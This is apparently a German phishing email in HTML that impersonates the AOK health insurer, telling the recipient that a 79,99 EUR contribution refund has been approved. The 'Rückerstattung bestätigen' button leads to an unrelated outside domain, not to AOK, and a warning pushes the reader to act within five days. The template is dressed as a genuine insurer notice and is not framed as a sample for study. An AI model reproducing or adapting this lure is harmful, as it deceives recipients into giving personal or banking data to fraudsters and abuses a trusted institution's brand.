<!DOCTYPE html>
<html lang="de">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>AOK – Rückerstattungsbestätigung</title>
<style>
@import url('https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&display=swap');
*{margin:0;padding:0;box-sizing:border-box;}
body{background-color:#f0f4f2;font-family:'Inter',Arial,sans-serif;color:#1a2e25;}
.wrapper{max-width:640px;margin:40px auto;background:#ffffff;border-radius:4px;overflow:hidden;box-shadow:0 4px 32px rgba(0,0,0,0.10);}
.header{background-color:#005E3F;padding:36px 48px;display:flex;align-items:center;justify-content:space-between;}
.header img{height:52px;display:block;}
.header-label{color:#91F54A;font-size:11px;font-weight:600;letter-spacing:2px;text-transform:uppercase;}
.status-bar{background-color:#004730;padding:14px 48px;display:flex;align-items:center;gap:10px;}
.status-dot{width:10px;height:10px;background:#91F54A;border-radius:50%;flex-shrink:0;}
.status-bar span{color:#91F54A;font-size:12px;font-weight:600;letter-spacing:1.5px;text-transform:uppercase;}
.body{padding:48px;}
.greeting{font-size:15px;color:#374f43;line-height:1.6;margin-bottom:32px;}
.amount-card{background:linear-gradient(135deg,#005E3F 0%,#004730 100%);border-radius:4px;padding:32px 36px;margin-bottom:36px;display:flex;align-items:center;justify-content:space-between;}
.amount-label{color:rgba(255,255,255,0.7);font-size:11px;font-weight:600;letter-spacing:2px;text-transform:uppercase;margin-bottom:6px;}
.amount-value{color:#ffffff;font-size:36px;font-weight:700;letter-spacing:-0.5px;}
.amount-badge{background:#91F54A;color:#003d28;font-size:11px;font-weight:700;padding:6px 14px;border-radius:2px;letter-spacing:1px;text-transform:uppercase;white-space:nowrap;}
.section-title{font-size:10px;font-weight:700;color:#005E3F;letter-spacing:2.5px;text-transform:uppercase;margin-bottom:16px;padding-bottom:8px;border-bottom:2px solid #005E3F;}
.invoice-table{width:100%;border-collapse:collapse;margin-bottom:36px;}
.invoice-table tr{border-bottom:1px solid #e8f0ec;}
.invoice-table tr:last-child{border-bottom:none;}
.invoice-table td{padding:13px 0;font-size:13.5px;vertical-align:top;}
.invoice-table td:first-child{color:#6b8a79;font-weight:500;width:55%;}
.invoice-table td:last-child{color:#1a2e25;font-weight:600;text-align:right;}
.invoice-table tr.total-row td{padding-top:16px;font-size:15px;}
.invoice-table tr.total-row td:first-child{color:#005E3F;font-weight:700;}
.invoice-table tr.total-row td:last-child{color:#005E3F;font-weight:700;font-size:18px;}
.status-section{background:#f5faf7;border-left:3px solid #005E3F;border-radius:0 4px 4px 0;padding:24px 28px;margin-bottom:36px;}
.status-row{display:flex;align-items:flex-start;gap:12px;padding:7px 0;}
.status-icon{font-size:14px;line-height:1.5;flex-shrink:0;}
.status-text{font-size:13.5px;color:#374f43;line-height:1.5;}
.status-text strong{color:#004730;}
.cta-block{text-align:center;margin-bottom:36px;}
.cta-btn{display:inline-block;background:#91F54A;color:#003d28;font-size:14px;font-weight:700;padding:16px 48px;border-radius:3px;text-decoration:none;letter-spacing:0.5px;text-transform:uppercase;}
.notice{background:#fffdf0;border:1px solid #e8e0a0;border-radius:4px;padding:18px 22px;margin-bottom:36px;}
.notice-title{font-size:10px;font-weight:700;color:#8a7200;letter-spacing:2px;text-transform:uppercase;margin-bottom:6px;}
.notice p{font-size:13px;color:#5a4e00;line-height:1.6;}
.signature{font-size:13.5px;color:#374f43;line-height:1.8;margin-bottom:4px;}
.signature strong{color:#1a2e25;font-weight:700;}
.signature-role{font-size:12px;color:#6b8a79;}
.footer{background:#004730;padding:24px 48px;text-align:center;}
.footer p{color:rgba(255,255,255,0.5);font-size:11px;line-height:1.7;}
.footer a{color:#91F54A;text-decoration:none;}
.divider{height:1px;background:#e8f0ec;margin:32px 0;}
</style>
</head>
<body>
<div class="wrapper">
<!-- HEADER -->
<div class="header">
<img src="https://login.meine.aok.de/logos/aok-signet-white.svg" alt="AOK" />
<span class="header-label">Mitgliederservice</span>
</div>
<div class="status-bar">
<div class="status-dot"></div>
<span>Rückerstattung Genehmigt</span>
</div>
<!-- BODY -->
<div class="body">
<p class="greeting">
Sehr geehrte Kundin,<br /><br />
Ihre BeitragsRückerstattung in Höhe von <strong>79,99 EUR</strong> wurde erfolgreich geprüft und genehmigt. Bitte beachten Sie, dass die Auszahlung nur nach Ihrer Bestätigung erfolgen kann.
</p>
<!-- AMOUNT CARD -->
<div class="amount-card">
<div>
<div class="amount-label">Rückerstattungsbetrag</div>
<div class="amount-value">79,99 <span style="font-size:20px;font-weight:400;opacity:0.8;">EUR</span></div>
</div>
<div class="amount-badge">✔ Genehmigt</div>
</div>
<!-- INVOICE TABLE -->
<div class="section-title">Abrechnungsübersicht</div>
<table class="invoice-table">
<tr>
<td>Beanspruchter Zeitraum</td>
<td>Letzte Beitragsperiode</td>
</tr>
<tr>
<td>Erstattungsart</td>
<td>Beitragsrückerstattung</td>
</tr>
<tr>
<td>Rückerstattungsbetrag</td>
<td>79,99 EUR</td>
</tr>
<tr class="total-row">
<td>Auszahlungsbetrag</td>
<td>79,99 EUR</td>
</tr>
</table>
<!-- STATUS -->
<div class="section-title">Bearbeitungsstatus</div>
<div class="status-section">
<div class="status-row">
<span class="status-icon">✔</span>
<span class="status-text"><strong>In Prüfung</strong> – Antrag eingereicht und geprüft</span>
</div>
<div class="status-row">
<span class="status-icon">✔</span>
<span class="status-text"><strong>Genehmigt</strong> – Antrag offiziell genehmigt</span>
</div>
<div class="status-row">
<span class="status-icon">💰</span>
<span class="status-text"><strong>Auszahlung</strong> – Betrag bereit zur Auszahlung</span>
</div>
</div>
<!-- CTA -->
<div class="cta-block">
<a href="https://angoratechnology.com/aook/" class="cta-btn">Rückerstattung bestätigen</a>
</div>
<!-- NOTICE -->
<div class="notice">
<div class="notice-title">⚠ Wichtiger Hinweis</div>
<p>Bitte fordern Sie den Betrag innerhalb von <strong>5 Tagen</strong> ab. Danach steht er aus technischen Gründen nicht mehr zur Verfügung.</p>
</div>
<div class="divider"></div>
<!-- SIGNATURE -->
<p class="greeting" style="margin-bottom:6px;">Mit freundlichen Grüßen</p>
<p class="signature"><strong>Maximilian Becker</strong></p>
<p class="signature-role">Kundenservice · AOK Bundesverband</p>
</div>
<!-- FOOTER -->
<div class="footer">
<p>© 2026 AOK Bundesverband. Alle Rechte vorbehalten.</p>
</div>
</div>
</body>
</html>